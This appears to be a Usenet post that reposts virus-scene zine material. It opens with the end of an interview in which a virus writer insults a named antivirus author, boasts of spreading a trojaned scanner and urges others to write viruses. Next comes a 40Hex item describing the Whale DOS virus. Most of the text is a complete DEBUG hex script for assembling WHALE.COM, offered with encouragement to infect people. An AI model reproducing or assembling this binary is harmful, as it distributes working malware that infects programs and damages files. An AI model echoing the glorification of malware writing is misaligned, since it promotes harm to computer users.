Ross Greenburg author of Flu-Shot. What
a dick. He's just an asshole tring to sell his shit product.
He's got a big mouth and instead of crashing his board, I'd
like to kick his fucken ass. Where's his office? Up one 57th
right? Lets take a walk. Just kiddin' but the guys product
sucks and he's just a greedy asshole. I'm glad I sent a trojan
version of his virus scanner around. Ha you dick!
HR: What virus authors do you look up to?
SSS: Myself - Ha Ha (laughter) Ha Ha. No, I love Whale - that was
clever. I like Dark Avenger, the real one. Its hard to be
original, and these guys were. Hats off you crazy fuckin'
Bulgarian Metal-Head!
HR: What about groups of virus writers?
SSS: I think were the only one. Oh yeah and those Rabid people you
told me about, yeah there just like us - people tring to make
there mark in the world, or should I say dent in the world.
Germans are bugging out too - Shit, they write half the shit out
there these days. More power to them
HR: What is your advise to people who want to write viruses?
SSS: Get a late pass! No as I said more power to you. Just remember
you got to have style and learn to be ORIGINAL.
HR: What next from you?
SSS: I don't really know. I'm waiting to hook up a few more people
to the pack, then we'll get the thing rollin HARD. Till then
'A little at a time...'
At the time this artical was finished, the Skism team was at work on
a new virus code named Bad Brains.
HR
--
Si
Smaug
Adam Stouffer <te...@NO-SPAM.sgi.net> writes:
>Why are you posting all this in respone to the stupid archange threads?
>Give these files their own subjects.
my sentiments exactly.
--
40Hex Volume 1 Issue 2 0006
The Whale Virus
Oh yes here it is, the biggest and meanest virus around. First
before you go and compile it read what Patti thinks of it.
Aliases: Mother Fish, Stealth Virus, Z The Whale
V Status: Research
Discovered: August, 1990
Symptoms: .COM & .EXE growth; decrease in available memory;
system slowdown; video flicker; slow screen writes;
file allocation errors; simulated system reboot
Origin: Hamburg, West Germany
Eff Length: 9,216 Bytes
Type Code: PRhA - Parasitic Resident .COM & .EXE Infector
Detection Method: ViruScan V67+, Pro-Scan 2.01+, NAV, IBM Scan 2.00+
Removal Instructions: Scan/D, CleanUp V67+, Pro-Scan 2.01+,
or Delete infected files
General Comments:
The Whale Virus was submitted in early September, 1990. This virus
had been rumored to exist since the isolation of the Fish 6 Virus in
June, 1990. It has been referred to by several names besides Whale,
including Mother Fish and Z The Whale. The origin of this virus is
subject to some speculation, though it is probably from Hamburg,
West Germany due to a reference within the viral code once it is [trash]
The first time a program infected with the Whale Virus is executed,
the Whale will install itself memory resident in high system memory
but below the 640K DOS boundary. On the author's XT clone, the
virus always starts at address 9D90. Available free memory will
be decreased by 9,984 bytes. Most utilities which display memory
usage will also indicate a value for total system memory which is
9,984 bytes less than what is actually installed.
The following text string can be found in memory on systems
infected with the Whale virus:
"Z THE WHALE".
Immediately upon becoming memory resident, the system user will
experience the system slowing down. Noticeable effects of the
system slowdown include video flicker to extremely slow screen
writes. Some programs may appear to "hang", though they will
eventually execute properly in most cases since the "hang" is due
to the slowing of the system.
When a program is executed with the Whale memory resident, the virus
will infect the program. Infected programs increase in length, the
actual change in length is usually 9,216 bytes. Note the "usually":
this virus does occasionally infect a program with a "mutant" which
will be a different length. If the file length increase is exactly
9,216 bytes, the Whale will hide the change in file length when a
disk directory command is executed. If the file length of the viral
code added to the program is other than 9,216 bytes, the file length
displayed with the directory command will either the actual infected
file length, or the actual infected file length minus 9,216 bytes.
Executing the DOS CHKDSK program on infected systems will result in
file allocation errors being reported. If CHKDSK /F is executed,
file damage will result.
The Whale also alters the program's date/time in the directory when
the file is executed, though it is not set to the system date/time
of infection. Occasionally, Whale will alter the directory entry
for the program it is infecting improperly, resulting in the directory
entry becoming invalid. These programs with invalid directory
entries will appear when the directory is listed, but some disk
utilities will not allow access to the program. In these cases, the
directory entry can be fixed with Norton Utilities FD command to
reset the file date.
The Whale occasionally will change its behavior while it is memory
resident. While most of the time it only infects files when
executed, there are periods of time when it will infect any file
opened for any reason. It will also, at times, disinfect files
when they are copied with the DOS copy command, at other times it
will not "disinfect on the fly".
Occasionally, the Whale Virus will simulate what appears to be a
system reboot. While this doesn't always occur, when it does occur
the Break key is disabled so that the user cannot exit unexpectedly
from the execution of the system's AutoExec.Bat file. If the
AutoExec.Bat file contained any software which does file opens of
other executable programs, those opened executable programs will
be infected at that time if they were not previously infected.
Typically, files infected in this manner will increase by 9,216
bytes though it will not be shown in a directory listing.
A hidden file may be found in the root directory of drive C: on
infected files. This file is not always present, the virus will
sometimes remove it, only to recreate it again at a later time.
The name of this hidden file is FISH-#9.TBL, it contains an
image of the hard disk's partition table along with the following
message:
"Fish Virus #9
A Whale is no Fish!
Mind her Mutant Fish
and the hidden Fish Eggs
for they are damaging.
The sixth Fish mutates
only if the Whale is in
her Cave."
After the discovery of this hidden file, the author of this
document made several attempt to have the Fish 6 Virus mutate
by introducing it and Whale into a system. Under no circumstances
did a mutation of either virus result, the resultant files were
infected with both an identifiable Fish 6 infection and a Whale
infection.
Whale is hostile to debuggers and contains many traps to prevent
successful decryption of the virus. One of its "traps" is to lock
out the keyboard if it determines a debugger is in use.
Here's a side note by the author of F-Prot
Whale
This is a recent, rather remarkable virus. It is long, 9216 bytes and
able to infect COM and EXE files. The increase in file size is not
visible though, while the virus is active in memory, as it uses several
advanced "stealth" methods. Other effects of the virus are not known,
but one infected program displayed the following message when run:
THE WHALE IN SEARCH OF THE 8 FISH
I AM '~knzyvo}' IN HAMBURG addr error D9EB,02
Most of the virus is devoted to encryption and code which moves blocks of
virus code around. This overhead results in a considerable slowdown of
infected systems.
And here it is. Use your editor to copy the below machine language
script to a file called WHALE.SCR Next use DEBUG to make it into a
COM file. Use the command DEBUG < WHALE.SCR When it gets done
you'll see a file called WHALE.COM. There it is, have fun - and
make some losers day!
------------------------------------------------------------------------------
n whale.com
e 0100 E9 C9 23 01 F5 21 E1 02 C0 00 D2 07 FF FF 99 14
e 0110 00 E9 B8 23 CD 20 8D 01 BD 00 E1 02 C0 00 D2 07
e 0120 FF FF 99 14 FE FF E3 8F 01 00 99 14 1E 00 00 00
e 0130 26 FB 5A 26 47 48 63 33 57 6E 52 4C 63 3D FF 10
e 0140 D4 06 75 EC 06 7E 17 75 25 FA 03 24 3D 8B 21 90
e 0150 C3 24 67 2A 08 12 07 C4 E0 5B 08 9C 06 E1 15 66
e 0160 03 7B 25 7D D4 06 4E 36 9C 08 90 C3 24 D4 06 4C
e 0170 36 FF 38 D4 06 4A 36 35 02 40 C7 20 7D 25 E5 13
e 0180 C7 20 48 25 26 34 C3 77 3D 8B 29 3D 8B 38 48 81
e 0190 E5 5C 01 BA 1D 53 AF CD CF CF 22 02 D9 A7 29 27
e 01A0 4A 2E D9 14 2E 05 24 5F D5 B7 EB 38 1D 1F CE BF
e 01B0 FF CC 4B BB 11 1B 81 11 06 EF A5 D0 02 A7 24 68
e 01C0 63 AD 0A 07 0C E8 A2 14 E8 5E 1A 38 38 E5 68 30
e 01D0 23 BD DB 29 AA 6A 23 92 26 48 3A F5 2C 38 B3 4A
e 01E0 E0 16 AE 59 1C 03 01 88 2C F6 F5 0E 92 3E 22 3A
e 01F0 B1 13 33 1C B7 D8 19 BD 1F FE 0B 4E 1C 0D F6 53
e 0200 0E F6 BD 2D 27 CE 28 09 1C D3 5C BE DE C0 E7 83
e 0210 5D 7A 67 A1 19 CD ED C2 4F 98 C3 2C 3E B6 4E 04
e 0220 D8 FE E4 6A D5 F7 C2 15 C6 AD F7 2A 21 D5 8C C2
e 0230 85 E2 6F ED F5 C2 5F CE A8 F7 28 B6 D3 28 29 D1
e 0240 28 A0 F3 FB CE 9A 1E CE EA 08 14 69 29 5A D9 73
e 0250 B4 0F 79 72 E5 7C D9 4C 54 D5 77 F9 79 47 BC 5A
e 0260 19 5F B6 47 F6 52 1A 5F 72 AE 7C 2D 4C 09 7E 81
e 0270 2F 7D 6E 21 72 AF 7C DB 4C 7A B4 65 5A 6F D0 E9
e 0280 01 09 EA A7 FD 73 27 FA 8B 23 9A F3 CE FB B3 2E
e 0290 3D C4 52 F8 2C C0 D4 48 21 F9 FD FC 90 E0 91 CB
e 02A0 2C 69 C9 EA 6C C9 EB C6 F9 3B D4 FA E0 B8 67 D7
e 02B0 0A 6E C6 D1 0C 4A 39 11 C2 97 D3 C6 0A 1D DB CD
e 02C0 D0 E8 59 1B 39 5E 83 3E 5C 45 F4 50 25 5C B6 55
e 02D0 7A 50 74 66 59 83 17 A1 AD 7E D2 4E 78 B6 CD 7F
e 02E0 FF 2E 5C D0 AB 5E 9B 7D 72 5E E5 A0 5B 7B 78 70
e 02F0 6A 7E 44 6B 56 DE 55 58 5E 6B 83 B6 E0 67 64 66
e 0300 2D CE 2C 08 01 E3 DE 77 E7 F0 75 E3 F1 F8 42 F6
e 0310 D6 40 F2 D7 CD 51 DE E3 53 D2 E2 DE 29 D5 B5 F2
e 0320 D0 30 28 27 A0 F8 42 13 F2 0B AD C9 CB CB CE 01
e 0330 08 31 25 18 11 23 24 10 0B 97 F3 01 18 9B 03 22
e 0340 10 0B B8 06 37 36 F8 65 29 08 3D FF 08 0B 00 76
e 0350 AB 00 26 9D D8 7E 98 1E E1 15 89 38 1F 00 AA 1D
e 0360 0E 26 FB 55 15 C8 89 C3 9D DB A7 75 06 D9 ED A3
e 0370 22 13 8C 28 1D 00 AF 25 0C 26 FB 5B 24 FA F2 28
e 0380 AD BB 8D F8 EF 89 A8 EF 8D B8 BF 99 FC AB CD B8
e 0390 AB 99 F8 EF CD B8 AB DD B8 EB 99 A8 BF 8D F8 2E
e 03A0 A6 1C AB C4 EA E8 F6 0D 51 A0 99 62 44 F8 A7 C8
e 03B0 B9 D9 54 71 95 A7 28 E3 AD EC 60 47 B0 E1 96 71
e 03C0 95 B7 21 DA DF 71 32 CD 99 8A CE 6F CB 92 10 8B
e 03D0 FE FA E8 26 13 5B A5 F8 72 75 9C 06 22 13 0E A9
e 03E0 15 06 26 1D 58 2B 55 F3 76 8E D7 AC EB 01 ED FA
e 03F0 BF 3A 98 07 AD 0B 33 E6 9D D8 CD FB 45 21 30 B8
e 0400 CD 20 64 A8 20 E7 98 85 31 80 18 9C C5 FE 31 7B
e 0410 43 8B 98 43 CD 9F 43 4E 9E 43 03 9E 43 A5 9F 43
e 0420 DF 80 8F E8 3B 14 5A CB 16 FC CA D0 2A CD 66 C8
e 0430 B0 FD 56 FE FD 54 C4 FE C3 F3 D9 99 FE 7D 2E C8
e 0440 1C 1B 22 C8 ED C4 67 EB DA 0A E9 D9 0A E9 DF 1E
e 0450 EB EA 34 EB E8 31 E5 EC 36 EB F6 68 E4 F5 1A E4
e 0460 F4 A0 F3 89 5C F0 80 B3 E7 85 8E F2 84 8E F2 9C
e 0470 F1 F0 88 D0 12 FC D0 62 CD 66 C8 23 C2 ED 23 F6
e 0480 F3 90 3D FF 00 8B 25 70 FA 90 3B FA 65 3B 50 41
e 0490 17 1C 39 29 64 E8 8D 15 1B 7A A7 B2 7A A7 33 7A
e 04A0 A7 68 7A C6 B9 54 B0 6A C9 6B D3 3C 49 01 92 9A
e 04B0 59 92 9A 41 66 DC D7 1A EC 75 CE 95 06 34 6D 50
e 04C0 D7 6B 94 7C 6A 61 07 33 24 01 36 26 C5 85 C7 45
e 04D0 7E 2E D9 35 EA 02 E5 E8 4F 15 28 44 5F EB 62 26
e 04E0 47 6A FD 74 1D 54 6C 53 5F E9 62 2A 47 6A 99 AB
e 04F0 BB 5F EC 52 28 47 6A F8 44 1F 54 4C CF 57 35 61
e 0500 99 E4 59 58 C3 98 BC 34 28 48 53 7C 41 8F 20 FB
e 0510 31 20 0F 26 BE 7E 02 2E F1 18 35 11 28 1F C9 9F
e 0520 05 35 8A 26 B3 23 88 71 D9 47 D7 D0 E8 6F 3B 1D
e 0530 D0 33 E7 50 26 2F 14 E2 DE 98 D9 CE FB 04 20 01
e 0540 45 4D D9 43 89 72 D9 33 05 14 31 00 12 7D 50 AD
e 0550 54 4B 56 08 EC 26 CC 37 E8 CE 16 0E B2 37 95 BC
e 0560 98 2E 74 A6 7C B7 87 7C AD 9A 9B E5 FB D4 23 0A
e 0570 58 78 18 6B A5 C5 9B F4 93 89 9D 9A BB 58 C2 4F
e 0580 58 C7 07 7C 10 5F 96 4B 45 64 D0 E8 93 16 28 97
e 0590 8C 38 B1 F5 94 B9 2E A7 CE 87 BF 80 8C 3A B1 F9
e 05A0 94 B9 4A 26 68 8C 3F 81 FB 94 B9 2B 97 CC 87 9F
e 05B0 1C 84 E6 B2 4A 63 8B 8B C3 CE 94 05 3F 73 7E 10
e 05C0 40 96 C8 AD 52 A2 F8 90 97 95 B1 A0 F8 7C C8 37
e 05D0 62 18 6C 88 F5 6F 7A E5 4B 83 60 1B 07 A1 4D 08
e 05E0 AF C9 87 78 11 81 C8 6B 04 AF E0 81 E5 FC 04 7B
e 05F0 3D FF 92 62 09 7E 26 0C 24 3D 88 21 16 0C 24 DF
e 0600 E9 7B 13 EB CE 2F 05 28 27 DC BC D9 1A ED 31 52
e 0610 37 2D F4 FA 54 28 1D 67 03 CF 6A FE CE 37 05 06
e 0620 34 CF 19 CB CF 05 31 97 01 B4 18 FE 41 21 8B 73
e 0630 21 82 F7 20 2F 14 21 F1 10 D1 46 2C A7 E9 7D 3B
e 0640 20 66 03 CF 4E 01 A6 7C 18 A6 92 7F 3B 13 24 55
e 0650 10 E9 69 12 81 49 0E 00 02 90 5F 39 13 E9 65 12
e 0660 E2 22 FA EC 22 F8 43 CF 2B 02 CE C5 04 2D 4B B0
e 0670 B4 B5 BC 3E 77 18 96 5B 44 72 61 03 CF 33 01 CE
e 0680 D2 04 06 67 C0 50 D7 75 5C 3C F4 BD 77 FA 91 DC
e 0690 74 52 D2 74 E3 66 C2 52 D5 F4 CE 49 8B 4C 4A 50
e 06A0 BA 81 6F 73 60 03 CF E5 00 CE 84 04 D7 00 1D 2A
e 06B0 B4 48 8C 02 13 8F CB 16 1B FF 05 53 25 60 36 E9
e 06C0 CA 35 06 0C BE D8 A7 75 B9 13 37 BA 13 35 2E EC
e 06D0 23 66 36 47 03 FA 98 00 FA F5 00 50 0F 5C 55 7C
e 06E0 53 5B 18 23 2A 1B 54 51 79 00 55 7C 53 5B 15 56
e 06F0 5A 67 55 40 15 23 2A 15 20 52 15 57 7B 54 6C 76
e 0700 15 69 60 15 6E 7C 15 46 7A 46 68 32 15 4D 7A 5B
e 0710 64 33 5D 65 61 15 4D 66 41 61 7D 41 20 55 5C 73
e 0720 7B 15 61 7D 51 20 67 5D 65 33 5D 69 77 51 65 7D
e 0730 15 46 7A 46 68 33 70 67 74 46 20 75 5A 72 33 41
e 0740 68 76 4C 20 72 47 65 33 51 61 7E 54 67 7A 5B 67
e 0750 3D 15 54 7B 50 20 60 5C 78 67 5D 20 55 5C 73 7B
e 0760 15 6D 66 41 61 67 50 73 33 5A 6E 7F 4C 20 7A 53
e 0770 20 44 5D 61 7F 50 20 7A 46 20 7A 5B 20 7B 50 72
e 0780 33 76 61 65 50 0E 0C 81 40 AA AE 00 A9 EF 05 EC
e 0790 23 66 36 47 06 A7 0B FF 05 53 25 FB DE 1A E1 CE
e 07A0 0B FD E5 FB 14 DB FA EC DA FB 97 25 02 0C C2 16
e 07B0 F1 04 E0 1A 4C 3A E4 A9 E2 06 EA F7 C7 30 0D 75
e 07C0 C4 9A D3 D0 54 17 A6 67 DA A6 7C 17 A6 92 6F 36
e 07D0 13 24 A6 4C 12 26 F8 CB C5 3D E8 40 10 0C D2 6E
e 07E0 27 59 90 D5 D9 90 D7 3A 78 EE DF 66 1B CD 07 E8
e 07F0 CE 43 03 2A CA 50 2C 41 9E F3 C0 9E DF 22 50 E5
e 0800 C7 75 23 FB 74 2C 60 4D CF 93 FC CF 50 03 AF 45
e 0810 02 AF 5D 04 CD F7 21 2A 11 E6 07 20 DB 75 AE 20
e 0820 26 0C 89 CF FB 00 26 48 53 7C 1D 58 23 03 00 27
e 0830 D0 33 F5 92 EE AE E8 E8 BE E8 E9 E0 16 EB CF B1
e 0840 06 A1 C0 89 38 17 00 2D DA 74 E6 5A E9 75 13 B9
e 0850 3A 13 53 71 FB E8 CD 11 1E 50 8D 2B AC 8D AA AC
e 0860 4B 89 46 03 53 D9 2B 8E D9 23 8A 4E 37 9E EB 67
e 0870 F5 2F 71 77 B8 77 6C 4F 67 7C CE D5 02 3E A5 3D
e 0880 97 A6 F1 92 F6 3D CF A1 37 63 ED E5 11 56 FF D6
e 0890 A4 6E CB 4D 45 89 BC 74 7B 90 C4 22 FA 04 D9 01
e 08A0 EB B7 9A 16 22 13 8B 38 1F 00 C2 12 0B EF 67 10
e 08B0 1E CA 72 2A 94 DA AF 05 04 26 22 C2 C4 F1 74 2D
e 08C0 92 C6 5E 17 E8 2D E8 E9 8E 1A EA CF 90 02 08 D5
e 08D0 84 6F 19 E8 2D DA 74 D5 9A 1E 2A 13 33 F5 9A 16
e 08E0 22 13 31 F6 B0 0C 26 FA 16 DB 92 C6 B6 27 B9 3A
e 08F0 13 F3 82 20 C9 CE FB 4A 24 5A F8 84 F4 71 08 E5
e 0900 FF 67 CE F8 61 5E DC 2D 4F 47 6B CF F6 C1 60 AD
e 0910 CC 60 BD CE EE F7 FA 68 2A DE CE 08 21 62 AD CC
e 0920 62 BD CE C6 04 FD 68 22 DE 62 AD FD 62 BD FF 52
e 0930 E4 DE 2C BD D0 EA F8 6A CC 71 24 C5 07 C8 8D DD
e 0940 36 AD E1 94 FA 5C D8 28 DE 52 C6 C3 75 90 C6 33
e 0950 A8 7D 33 FB F1 D9 90 C6 24 A8 8B 53 FB E8 D9 90
e 0960 C6 24 A8 81 26 FB DF D9 90 C6 2E A8 08 2C FB D6
e 0970 D9 90 C6 24 A8 2F 16 FB CD D9 90 C6 24 A8 A5 24
e 0980 FB C4 D9 90 C6 78 A8 7D 33 FB BB D9 90 C6 23 A8
e 0990 9F 86 FB B2 D9 90 C6 2C A8 A7 26 FB A9 D9 90 C6
e 09A0 2A A8 2D A1 FB A0 D9 90 C6 24 A8 29 5E FB 97 D9
e 09B0 90 C6 24 A8 29 64 FB 8E D9 90 C6 24 A8 C0 3C FB
e 09C0 85 D9 90 C6 4A A8 14 37 FB 7C D9 90 C6 29 A8 00
e 09D0 26 FB 73 D9 90 C6 2D A8 E3 24 FB 6A D9 48 C3 CE
e 09E0 72 01 0A BA A7 88 05 1C AB 03 8C 8F 33 7F 7C 1E
e 09F0 B7 DD B4 B6 3B B5 13 3A 9E 87 70 AC CF AA 0E B9
e 0A00 A1 45 BF E9 9F 5F 89 76 8D 0F E4 B6 67 C0 B1 A2
e 0A10 67 70 08 D7 1E E3 37 E8 0F 12 27 26 9F C0 A7 F8
e 0A20 00 02 0E 00 26 20 D2 08 98 0E E5 37 49 27 D8 15
e 0A30 26 13 41 D1 E2 89 62 30 92 B5 E4 F1 AF 57 21 CE
e 0A40 54 18 0E FA 5D DB FB FA 26 26 52 9C AF A8 90 60
e 0A50 5E 76 A7 73 C4 43 BA 14 BA DE BC CD 93 4F 80 26
e 0A60 6C 6F DE 72 D5 77 5A C8 4C E6 64 5C 6B A9 52 74
e 0A70 1B D1 B6 50 E2 76 A9 A1 8E A9 6C 8E A9 58 6C 77
e 0A80 C3 E9 FA 06 DC FB E8 9C 13 1A B6 6B 3E 4C 67 B1
e 0A90 92 7E 76 97 AD 55 A0 11 B5 06 81 78 78 79 78 AF
e 0AA0 79 78 53 94 8B E5 FB 80 2E FB 17 2E 61 43 08 93
e 0AB0 3E 84 37 00 52 28 E8 DE 02 83 DD EC 74 15 FB 82
e 0AC0 26 37 84 8C 69 8A 00 B3 8A A5 2E 90 A2 28 D6 86
e 0AD0 A4 44 50 38 AA 03 34 A0 84 1E C1 5C B1 0D FF B1
e 0AE0 0D FC 6B 6C 01 80 A1 08 93 26 95 37 FE CF A0 FC
e 0AF0 CE FA 97 DF FB 4C 26 00 D5 FD C1 3D D8 CE 6C E7
e 0B00 C6 FB 52 65 F1 4C 94 F1 1B B8 C2 E7 E1 AF 53 04
e 0B10 26 1D 4E 26 53 E5 26 E1 56 FE 26 13 E8 05 17 2E
e 0B20 D8 15 A2 02 F8 C1 9D FA 61 DF 2E E8 33 13 0F 7E
e 0B30 FF 77 78 65 A7 68 2D 7D 78 54 5F 96 00 4F 6E D0
e 0B40 E9 34 10 3D F3 05 74 DE 3E EF 34 5D FE E1 FA 99
e 0B50 DB 98 D5 AF F6 BB 75 D0 53 EA AD 01 9D 19 C0 52
e 0B60 10 E9 BE 11 E8 FA EC 4D 74 5F 00 5A CD 54 52 65
e 0B70 7C FD 5F 76 50 6F 97 42 65 76 CD 4F 52 CB B0 76
e 0B80 7A 46 A1 D0 1F 4D CD 11 52 CB 46 77 87 E5 E9 8B
e 0B90 BE BA 52 B8 0F 5A CE 54 92 65 7C FB 47 BA 50 6F
e 0BA0 DD 72 F2 76 7A F9 53 3F 46 CE CF B0 76 5A BE 4C
e 0BB0 41 65 BA A0 57 1C 55 31 2E A5 1D B3 02 12 2E D9
e 0BC0 25 B3 02 3D FF 10 FB 24 08 EC 36 C0 37 55 08 D7
e 0BD0 1E 02 37 89 C3 FA BD DE 9A 04 CE 75 FF 02 29 D2
e 0BE0 5B 2E 34 1B 90 2E 1C 96 68 38 07 9B BF 0D C8 B3
e 0BF0 5C 37 3A EE 7F E2 29 3A 32 D7 3C BE 0D D1 F7 C1
e 0C00 BD 0A 0C 2E E3 25 03 03 90 FE 27 66 40 CE 20 FF
e 0C10 11 01 99 22 1B 12 B7 C3 02 80 50 3C CB 17 74 11
e 0C20 02 C1 1A 88 04 31 24 ED 02 19 12 1A 8E 14 37 24
e 0C30 11 2A 13 12 B7 C2 02 1A 88 0C 35 24 ED 02 15 12
e 0C40 1A 8E 14 CB 25 FA 75 17 2A CF 00 01 2F FA D8 26
e 0C50 FB F0 D8 D7 30 FE C7 C8 FF 24 30 38 11 37 55 C1
e 0C60 CA D5 11 F0 AD 02 30 AF 59 30 FE CD CF AD 50 31
e 0C70 AF 29 30 FE C6 CF AD 70 32 AF 3F 30 FE FF CF AD
e 0C80 73 35 AF 29 30 FE F0 CF AD 26 37 AF 63 30 FE E9
e 0C90 CF AD B3 37 AF 75 30 FE E2 CF AD 13 3A AF 07 30
e 0CA0 FE 9B CF AD 29 3C AF 2D 30 FE 8C CF AD E7 3C AF
e 0CB0 1F 30 FE 85 CF AD 79 20 AF 0E 30 FE BE CF AD 25
e 0CC0 21 AF 0A 30 FE B7 CF AD 29 11 AF 44 30 FE A8 CF
e 0CD0 AD 50 11 AF FB 30 FE A1 CF AD 4F 13 AF 1A 30 FE
e 0CE0 5A CF AD 5E 2D AF 06 30 FE 53 CF AD 5F 2C AF 61
e 0CF0 30 FE 44 CF 2A C3 44 0C 0D F7 10 BB 15 E2 D7 8B
e 0D00 8E 06 AC 18 70 03 D6 AD E8 D1 25 36 16 DC CF FE
e 0D10 FE 26 FE 86 C7 FE 52 25 D3 D0 5B A7 D0 78 24 41
e 0D20 83 CB 11 FF C3 FA DB 26 FB 18 D8 0B 90 3D 87 93
e 0D30 F2 81 C3 3D DF 94 37 70 D8 E5 02 63 FF C5 91 6E
e 0D40 D8 78 F3 96 89 52 7B 0E 39 A9 07 03 FB 74 23 FB
e 0D50 5F 29 3D FE 20 FC 24 CE FB 01 08 ED 0E C9 37 E8
e 0D60 C7 EE 46 FC 7D 8B D2 36 CC 9A EC 32 E1 31 32 62
e 0D70 3E 32 9F 3E 54 27 47 19 D2 36 EC 4F ED F4 03 FF
e 0D80 32 D8 E7 25 CA 2F FE 73 CF D0 FC 46 DC F0 C9 C4
e 0D90 4C EB 1F EA C3 DA 14 1A 2D E3 54 82 D2 42 FC 03
e 0DA0 ED F4 72 DF DB D9 21 3A E8 8E 2E D9 3D 03 03 FB
e 0DB0 91 DB 0D 4C E1 03 4D E1 DF 07 B6 D6 48 E1 DF 01
e 0DC0 B6 D6 08 68 D4 CC 25 83 C5 2E 5B A4 68 4E A4 D2
e 0DD0 4B 53 CD 98 2E E0 97 10 34 FA 5D 9F 17 00 AA C8
e 0DE0 09 CD 9D DB F7 F0 E2 DA 9A C8 9F 0F 00 24 34 43
e 0DF0 C4 E8 50 AD 1C 0E 7E C3 EF CF 0E 04 1A 12 74 36
e 0E00 FA 88 D0 12 CB A7 E8 34 0E 61 F8 A7 E2 21 07 B2
e 0E10 E8 16 EE 28 26 3D 83 28 A0 24 27 3D 8C 20 35 24
e 0E20 08 9A 1E 02 37 E8 B4 E5 2E D9 05 66 03 FB 0C D1
e 0E30 3D C4 38 37 24 00 D6 77 34 FB 4D 32 3A 73 25 FA
e 0E40 9E 26 3D 80 00 A0 24 D8 90 FE 27 67 41 CE E0 FC
e 0E50 3E 13 8B 22 10 44 24 40 8B 7A 17 81 D5 5B 53 A7
e 0E60 E0 49 60 12 D8 7D FB 20 32 0A 75 71 FB D4 DA 08
e 0E70 00 AD 4F 01 AD 93 4B FA 9A 04 AD 93 4D FA 9A 44
e 0E80 24 98 80 69 CF 89 62 17 E8 D8 00 1C CD 26 E8 94
e 0E90 EF 30 26 98 16 3C 13 E8 A9 17 2E AD 1D A3 02 90
e 0EA0 C1 36 12 CA 00 9A 57 32 B2 18 26 35 89 61 01 A1
e 0EB0 34 13 03 E7 35 89 61 03 A1 32 13 26 AF 54 0E CE
e 0EC0 D4 13 17 FB 7D DA 0B 00 CE 4D 04 08 9D 1E 85 37
e 0ED0 8B 60 11 A3 2C 13 8B 60 17 A3 2A 13 E8 8C 00 19
e 0EE0 CF D3 F8 08 9F 0E 1C 11 2E AA 05 3C 24 3D 89 00
e 0EF0 2D 02 08 D5 06 1F 11 01 38 4B E8 60 EF 37 B6 6B
e 0F00 AA 40 37 BA 98 7C 86 D0 A6 11 4F 4B 97 C5 88 11
e 0F10 4F 44 97 C3 88 10 48 87 E2 B0 AD 56 B0 59 B4 B7
e 0F20 AD 10 88 59 B4 B6 F7 97 5E 0C 65 EE 6A 93 B6 6B
e 0F30 18 43 6B C4 A5 BB 2E A6 2D DA 02 13 74 25 FA 20
e 0F40 27 D0 E8 D8 E8 27 96 8D 76 90 A2 B0 7F 8D 76 90
e 0F50 A1 B0 2E 8D 76 90 A0 B0 B5 4B 62 87 4B 9D 97 65
e 0F60 B6 B6 A3 B1 17 9D B0 B2 EE EA 7E BF A3 BE 67 0E
e 0F70 A7 2D 00 02 49 4D 52 15 FE 28 33 00 52 68 E8 E4
e 0F80 E8 10 44 D0 66 60 A0 83 B3 90 67 44 73 5B B4 99
e 0F90 95 56 60 72 47 B2 0A 02 18 06 2A 37 74 7E FB A2
e 0FA0 DD 01 2C 81 29 87 2E 86 2C 08 9E 85 2E C8 DD 01
e 0FB0 ED C4 DF 2D 3F 52 12 40 AF 05 02 02 B0 04 02 90
e 0FC0 3E 32 37 01 53 17 E9 BE 13 E8 CE 3E FF CE 60 FB
e 0FD0 07 50 84 63 44 67 64 50 C8 A3 7B 45 6D 74 E0 73
e 0FE0 74 C0 63 54 67 77 97 45 75 74 BD 9A F3 4D 41 B8
e 0FF0 D4 77 72 E8 2F 12 E9 4E 13 81 D8 13 0F 55 71 E8
e 1000 67 E8 22 D2 46 F4 F6 44 F0 D2 E6 36 73 E5 D0 71
e 1010 E1 F4 D3 25 55 D6 C3 57 DA E7 C1 9A B4 C1 9B A1
e 1020 F5 10 0F 90 C0 C4 74 1F B2 F2 02 37 04 53 21 E8
e 1030 EE ED E8 28 E8 27 E3 67 2C 5B C6 C5 6B D8 C5 C7
e 1040 21 23 E6 6F E6 40 D7 E1 42 D6 E1 E0 D0 C7 C7 21
e 1050 1D D6 9F 83 D6 9E 96 40 D2 E1 0B FA D7 CB FB 9E
e 1060 26 FB DF DC 36 E0 72 CD CE 39 E5 86 E3 DD 6B C8
e 1070 01 C4 7E F2 A3 E8 78 F6 32 D7 CE 48 ED 16 E2 DD
e 1080 1F D0 95 C5 2E B5 F1 2E 0C F1 E0 D0 E8 92 E9 6D
e 1090 74 4F EA 74 16 4D 5A BE 44 12 64 DB 7A 68 76 CC
e 10A0 41 10 FD 57 79 50 72 9B 47 93 7C 8B 57 34 51 F5
e 10B0 6D CE 41 76 C5 5D 7C 8B 57 34 51 72 9B CC 41 10
e 10C0 47 93 7C 8B 57 34 51 F0 4E C0 7E E8 70 41 7C 8B
e 10D0 57 34 51 72 9B CC 43 10 FF 90 7C 8B 57 34 51 C8
e 10E0 44 DF 65 F1 DD 65 D9 8C 44 5D 74 C2 80 74 64 A2
e 10F0 8B 68 95 CD 51 52 83 B0 D9 84 A9 DE 65 2F C3 CE
e 1100 52 FA 40 97 B7 6B 2F 84 E0 1C 55 8C 68 92 C4 B2
e 1110 35 BE 23 C4 18 97 A0 8C 68 92 C4 B2 3C B2 97 73
e 1120 44 1C 4E 29 47 3C A2 D5 AA 5D 81 E2 87 2E 84 86
e 1130 A4 56 A3 6E 30 E2 7F 8C A0 7F 15 A2 7F AF 57 51
e 1140 82 2E B2 85 64 91 B7 86 96 D7 A4 99 83 2B A1 FD
e 1150 87 29 8E 83 51 82 EB 9D 48 64 91 94 B0 51 42 A4
e 1160 78 80 6E 7F B0 A3 7F A4 B3 F0 E8 F9 E4 BE 11 1B
e 1170 81 12 06 EF A5 D5 02 A7 27 68 63 D5 06 15 19 3D
e 1180 CE 39 13 E0 15 33 2C FA 81 12 7B 45 A5 FD 02 A7
e 1190 27 15 C9 92 C6 F5 0B E8 94 E4 E8 80 EA 2D E0 5E
e 11A0 F0 99 F0 C1 BB 3D 51 E0 5E C8 C9 F1 7E E1 82 4D
e 11B0 F6 FE E2 16 10 46 95 DE E8 60 DB 50 C5 D5 B3 E3
e 11C0 55 03 60 FB 39 F6 B3 E3 08 6B D6 CE D0 E8 55 EA
e 11D0 43 D4 09 95 27 CF 34 D2 77 D7 D4 CF 72 DA C1 F2
e 11E0 D4 94 D9 30 A1 CE CD 92 D7 FA 1F F4 42 C4 49 DE
e 11F0 E1 4B C2 E1 16 94 CF 7A D3 A2 10 2C 05 B2 FA 43
